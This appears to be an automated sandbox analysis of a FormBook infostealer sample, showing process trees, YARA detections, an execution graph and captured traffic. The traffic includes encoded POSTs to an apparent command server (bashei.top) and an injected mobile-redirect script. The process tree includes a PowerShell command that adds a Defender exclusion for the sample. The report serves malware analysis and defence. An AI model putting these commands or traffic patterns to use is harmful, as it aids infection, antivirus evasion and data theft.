                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              63192.168.2.75972423.225.34.7580
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:46.490766048 CEST710OUTPOST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 65 6c 2f 76 4b 6d 35 42 4d 77 4b 74 50 73 58 7a 39 59 63 76 5a 72 7a 55 46 75 63 38 34 37 47 76 54 53 57 72 7a 45 56 5a 4b 56 43 37 43 69 62 44 2f 32 46 55 73 52 42 42 7a 50 6d 6c 74 70 6a 57 51 64 66 71 37 30 46 6a 4c 35 57 44 6e 64 75 73 59 2b 30 52 45 4c 4e 77 38 4f 4e 73 59 48 73 73 42 45 52 62 70 4b 75 7a 50 6f 43 4d 50 4b 65 79 53 75 4b 51 67 2f 53 61 57 31 36 36 7a 56 76 4e 59 6e 63 44 4c 63 59 78 2f 64 4d 4e 72 45 46 59 61 49 77 6c 79 4c 4d 50 59 63 78 6c 4a 37 70 2b 74 43 69 5a 30 34 32 6d 6f 63 6d 47 37 43 54 6a 57 63 6b 42 78 52 63 77 66 43 54 43 64 2f 74 65 56 2b 5a 2b 75 72 67 51 79 31 4f 41 70 54 5a 49 6f 30 71 72 61 74 78 58 71 6e 73 35 69 4d 66 73 4c 6c 47 6d 44 36 41 3d
                                                              Data Ascii: XvhP6L=el/vKm5BMwKtPsXz9YcvZrzUFuc847GvTSWrzEVZKVC7CibD/2FUsRBBzPmltpjWQdfq70FjL5WDndusY+0RELNw8ONsYHssBERbpKuzPoCMPKeySuKQg/SaW166zVvNYncDLcYx/dMNrEFYaIwlyLMPYcxlJ7p+tCiZ042mocmG7CTjWckBxRcwfCTCd/teV+Z+urgQy1OApTZIo0qratxXqns5iMfsLlGmD6A=
                                                              Sep 11, 2024 22:58:47.064145088 CEST707INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:46 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              64192.168.2.75972523.225.34.7580
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:49.038165092 CEST1723OUTPOST /u0n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.bashei.top
                                                              Origin: http://www.bashei.top
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.bashei.top/u0n6/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 65 6c 2f 76 4b 6d 35 42 4d 77 4b 74 50 73 58 7a 39 59 63 76 5a 72 7a 55 46 75 63 38 34 37 47 76 54 53 57 72 7a 45 56 5a 4b 56 4b 37 44 58 50 44 2f 52 52 55 2b 42 42 42 39 76 6d 6b 74 70 69 4d 51 64 57 68 37 30 5a 5a 4c 36 2b 44 6e 37 53 73 61 50 30 52 4b 4c 4e 77 2b 4f 4e 70 47 33 74 32 42 45 42 66 70 4b 65 7a 50 6f 43 4d 50 4a 57 79 56 36 65 51 6d 2f 53 64 52 31 37 37 35 31 76 70 59 6e 45 35 4c 63 63 48 2f 73 73 4e 72 6b 56 59 59 39 63 6c 36 4c 4d 33 55 38 78 48 4a 37 31 62 74 43 2f 6d 30 34 44 44 6f 62 43 47 36 54 75 6b 4f 4d 59 39 6d 53 51 51 55 6a 50 2f 55 75 52 52 61 4f 46 35 70 72 46 72 73 48 69 68 68 69 5a 46 6a 45 37 39 62 75 42 7a 76 56 67 77 71 4b 4b 32 5a 77 61 6c 5a 2f 4b 30 31 4a 34 4d 51 44 2b 79 61 2b 51 4a 42 4a 6e 36 4d 39 78 38 34 4e 74 6f 43 53 65 56 6d 4b 4f 6e 6d 64 55 64 4a 51 70 53 72 4e 4e 32 45 36 32 67 35 43 45 4f 48 61 55 46 4e 62 37 7a 73 41 33 55 6c 44 52 54 69 58 74 32 71 49 31 59 31 78 48 42 52 43 50 79 46 51 7a 6b 74 65 46 49 38 45 31 6f 42 30 66 [TRUNCATED]
                                                              Data Ascii: XvhP6L=el/vKm5BMwKtPsXz9YcvZrzUFuc847GvTSWrzEVZKVK7DXPD/RRU+BBB9vmktpiMQdWh70ZZL6+Dn7SsaP0RKLNw+ONpG3t2BEBfpKezPoCMPJWyV6eQm/SdR17751vpYnE5LccH/ssNrkVYY9cl6LM3U8xHJ71btC/m04DDobCG6TukOMY9mSQQUjP/UuRRaOF5prFrsHihhiZFjE79buBzvVgwqKK2ZwalZ/K01J4MQD+ya+QJBJn6M9x84NtoCSeVmKOnmdUdJQpSrNN2E62g5CEOHaUFNb7zsA3UlDRTiXt2qI1Y1xHBRCPyFQzkteFI8E1oB0fa2m2Iqpi0F14moRfYvAR0kKsq3+UEQUt3ac6CZT6YnofIP1ZSXqpRDmoBGYaaZZqAUA2ktGbOFCCEB//+ij9FObB1l5kEApI2Har68SNjBM41H3GFgwfEXiybek5+/ny8PyAuMIm5ZrE1+bRsD+VVl5VITbQfKEEj5X8XxQs0s0qstmr1loFPD7Ui05+RZcUCNZx6xnaem8SFdEIwZlDyDHbwpxwkIvJAa2niNwh6Khd1293oCMDf0Tplatll/XbcaRn+eVAySSSbAMmL5AHh6ZFlcFvMadyzwsDbQGN5DFdrGkONbvTs9lPwNT98ktmfSeFGKbhxsErXpCyccEtDG/wA7LagXt9br0iyCyYzEEi1B6eHZ5JXzvhdWEePh5OOBuTweIDIRerYgtvi6dcSqBDpoSjSy1EcQr/rut5e0jMI45gbSUE/LoW4ohw1cv36zNeTedqWPgtn2pZqhnGsPRNJ32vq7GNopu74LMmBFPNC48zGf9r5umNtcvPcuw6vbxv6Hv81Ae0Ytp81F41U2UBeeZrB989DWHlgbtervW5O5E3WbP1+40ownJRfHDub5hgtOiPX365M1CwNeFheUENA01+XvQMoj4GHMNJYGUZuXEsSzLbxSNTDp+dX2ObHlQIMX9i4dnPOsvik1P89z320rqI37VwT9 [TRUNCATED]
                                                              Sep 11, 2024 22:58:49.705274105 CEST707INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              65192.168.2.75972623.225.34.7580
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:58:51.585516930 CEST438OUTGET /u0n6/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=TnXPJRFedBjcAOKsz8A4RrjZJ/J8mpS0RRmNukYQVSavKw+Pr3ZL00k0+s6r1anvS9TkkUZZGYzdsNqRXNwCKrFNx4FeTSUtckB8ipahHKvydrXWZ9yissqQQy/l7XTEZmUeENIc2eR0 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.bashei.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:58:52.842560053 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:58:52 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Data Raw: 35 64 39 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e [TRUNCATED]
                                                              Data Ascii: 5d9<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><script type="text/javascript" src="https://js.users.51.la/21851687.js"></script><script language="javascript">if(window.navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad)/i)) {setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html"];window.location.href=arr[parseInt(Math.random()*arr.length)]},0000); }else if(window.navigator.userAgent.match(/(Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)){setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https:/ [TRUNCATED]
                                                              Sep 11, 2024 22:58:52.842576981 CEST449INData Raw: 61 64 2f 35 37 36 30 31 38 36 39 2f 35 37 36 30 31 38 36 39 61 32 2e 68 74 6d 6c 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 35 37 36 30 31 38 36 39 2e 78 6e 2d 2d 74 6e 71 78 38 31 63 38 35 67 6e 31 6f 39 75 64 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64
                                                              Data Ascii: ad/57601869/57601869a2.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/
                                                              Sep 11, 2024 22:58:52.843014002 CEST5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:16:54:14
                                                              Start date:11/09/2024
                                                              Path:C:\Users\user\Desktop\r9856_7.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\r9856_7.exe"
                                                              Imagebase:0xc80000
                                                              File size:712'192 bytes
                                                              MD5 hash:6ABB344635C64E538866F0E7386E2568
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:16:54:15
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
                                                              Imagebase:0x970000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:16:54:15
                                                              Start date:11/09/2024
                                                              Path:C:\Users\user\Desktop\r9856_7.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\r9856_7.exe"
                                                              Imagebase:0x6b0000
                                                              File size:712'192 bytes
                                                              MD5 hash:6ABB344635C64E538866F0E7386E2568
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:16:54:15
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:16:54:17
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0x7ff7fb730000
                                                              File size:496'640 bytes
                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:16:54:26
                                                              Start date:11/09/2024
                                                              Path:C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe"
                                                              Imagebase:0xf60000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:8
                                                              Start time:16:54:27
                                                              Start date:11/09/2024
                                                              Path:C:\Windows\SysWOW64\cmdkey.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                              Imagebase:0xb30000
                                                              File size:17'408 bytes
                                                              MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:16:54:40
                                                              Start date:11/09/2024
                                                              Path:C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe"
                                                              Imagebase:0xf60000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:12
                                                              Start time:16:54:53
                                                              Start date:11/09/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff722870000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:10.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:173
                                                                Total number of Limit Nodes:6
                                                                execution_graph 27053 72dac1d 27054 72dac07 27053->27054 27055 72dacab 27054->27055 27060 72dc408 27054->27060 27075 72dc4c6 27054->27075 27091 72dc418 27054->27091 27056 72dafd5 27061 72dc418 27060->27061 27072 72dc43a 27061->27072 27106 72dc857 27061->27106 27111 72dce1d 27061->27111 27117 72dca7d 27061->27117 27122 72dc8a2 27061->27122 27127 72dccc0 27061->27127 27131 72dc9c0 27061->27131 27136 72dcb07 27061->27136 27142 72dcc04 27061->27142 27146 72dc945 27061->27146 27152 72dcc65 27061->27152 27157 72dca2a 27061->27157 27161 72dc9f2 27061->27161 27072->27056 27076 72dc454 27075->27076 27078 72dc4c9 27075->27078 27077 72dc43a 27076->27077 27079 72dca2a 2 API calls 27076->27079 27080 72dcc65 2 API calls 27076->27080 27081 72dc945 2 API calls 27076->27081 27082 72dcc04 3 API calls 27076->27082 27083 72dcb07 4 API calls 27076->27083 27084 72dc9c0 2 API calls 27076->27084 27085 72dccc0 2 API calls 27076->27085 27086 72dc8a2 2 API calls 27076->27086 27087 72dca7d 2 API calls 27076->27087 27088 72dce1d 4 API calls 27076->27088 27089 72dc857 2 API calls 27076->27089 27090 72dc9f2 3 API calls 27076->27090 27077->27056 27079->27077 27080->27077 27081->27077 27082->27077 27083->27077 27084->27077 27085->27077 27086->27077 27087->27077 27088->27077 27089->27077 27090->27077 27092 72dc432 27091->27092 27093 72dca2a 2 API calls 27092->27093 27094 72dcc65 2 API calls 27092->27094 27095 72dc945 2 API calls 27092->27095 27096 72dcc04 3 API calls 27092->27096 27097 72dcb07 4 API calls 27092->27097 27098 72dc9c0 2 API calls 27092->27098 27099 72dccc0 2 API calls 27092->27099 27100 72dc8a2 2 API calls 27092->27100 27101 72dca7d 2 API calls 27092->27101 27102 72dce1d 4 API calls 27092->27102 27103 72dc43a 27092->27103 27104 72dc857 2 API calls 27092->27104 27105 72dc9f2 3 API calls 27092->27105 27093->27103 27094->27103 27095->27103 27096->27103 27097->27103 27098->27103 27099->27103 27100->27103 27101->27103 27102->27103 27103->27056 27104->27103 27105->27103 27107 72dc8a9 27106->27107 27165 72da7c4 27107->27165 27169 72da7d0 27107->27169 27112 72dcb1e 27111->27112 27113 72dcb33 27111->27113 27173 72da3a9 27112->27173 27180 72da300 27112->27180 27184 72da2f8 27112->27184 27113->27072 27118 72dca8d 27117->27118 27188 72da548 27118->27188 27192 72da540 27118->27192 27119 72dd25a 27123 72dc8a8 27122->27123 27125 72da7c4 CreateProcessA 27123->27125 27126 72da7d0 CreateProcessA 27123->27126 27124 72dc980 27124->27072 27125->27124 27126->27124 27196 72da638 27127->27196 27200 72da630 27127->27200 27128 72dcce2 27132 72dd1c9 27131->27132 27204 72da488 27132->27204 27208 72da481 27132->27208 27133 72dc9a8 